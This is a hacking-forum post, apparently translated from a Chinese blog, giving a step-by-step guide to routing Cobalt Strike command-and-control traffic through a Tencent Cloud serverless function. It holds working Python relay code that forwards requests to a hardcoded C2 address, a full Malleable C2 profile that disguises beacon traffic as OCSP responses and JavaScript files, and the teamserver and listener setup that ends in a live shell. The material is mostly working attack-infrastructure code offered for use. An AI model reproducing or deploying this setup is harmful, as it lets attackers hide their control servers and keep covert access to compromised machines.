Jump to content

Title: Use Tencent Cloud Function to launch CS

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

First, we need to log in to Tencent Cloud and enable cloud functions.

After logging in to Tencent Cloud, search for cloud functions. Just open it.pau1haee3dx19538.png

First login, authorization is required.

After logging into the console, click Create.d0gn0ckryw519539.png

The function name is free, choose to start from scratch, fill in Python 3.6 in the environment, pull down after selecting, and put the code inside.hq0x1ebuvbl19540.png

Copy the following code and modify the server address.

# coding: utf8

import json,requests,base64

def main_handler(event, context):

response={}

path=None

headers=None

try:

C2='http://43.134.164.72:80'

if 'path' in event.keys():

path=event['path']

if 'headers' in event.keys():

headers=event['headers']

if 'httpMethod' in event.keys() and event['httpMethod']=='GET' :

resp=requests.get(C2+path,headers=headers,verify=False)

else:

resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)

print(resp.headers)

print(resp.content)

response={

'isBase64Encoded': True,

'statusCode': resp.status_code,

'headers': dict(resp.headers),

'body': str(base64.b64encode(resp.content))[2:-1]

}

except Exception as e:

print('error')

print(e)

Finally:

Return response

xizi1clkb0z19541.png

When finished, click Save!

Then click Trigger Management to create a trigger

The format is as follows aibcxl4r51d19542.png

Click the API name to edit it and arrive at this page. The path is modified to /azi0ywnfdfd19543.png

Click to publish service after completion

Added the profile file of C2, named win_tecent_cloud_func.profile

set sample_name 't';

set sleeptime '3000';

set jitter '0';

set maxdns '255';

set useragent 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)';

http-get {

set uri '/api/x';

client {

header 'Accept' '*/*';

metadata {

base64;

prepend 'SESSIONID=';

header 'Cookie';

}

}

server {

header 'Content-Type' 'application/ocsp-response';

header 'content-transfer-encoding' 'binary';

header 'Server' 'Nodejs';

output {

base64;

print;

}

}

}

http-stager {

set uri_x86 '/vue.min.js';

set uri_x64 '/bootstrap-2.min.js';

}

http-post {

set uri '/api/y';

client {

header 'Accept' '*/*';

id {

base64;

prepend 'JSESSION=';

header 'Cookie';

}

output {

base64;

print;

}

}

server {

header 'Content-Type' 'application/ocsp-response';

header 'content-transfer-encoding' 'binary';

header 'Connection' 'keep-alive';

output {

base64;

print;

}

}

}

After saving, store it in the cs directory.

Start the cs server

./teamserver vpsip admin12345 win_tecent_cloud_func.profile xeauzvlynty19544.png

Fill in the public network interface address domain name of the cloud function into the listener's http hosts and the stager's hosts

Be careful not to http and 80 ubytwr3scui19545.png

Add listening n0u4x00zxiw19546.png

It was successfully launched after generating the shell.78.png Original text connection: https://blog.bbskali.cn/3771.html

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.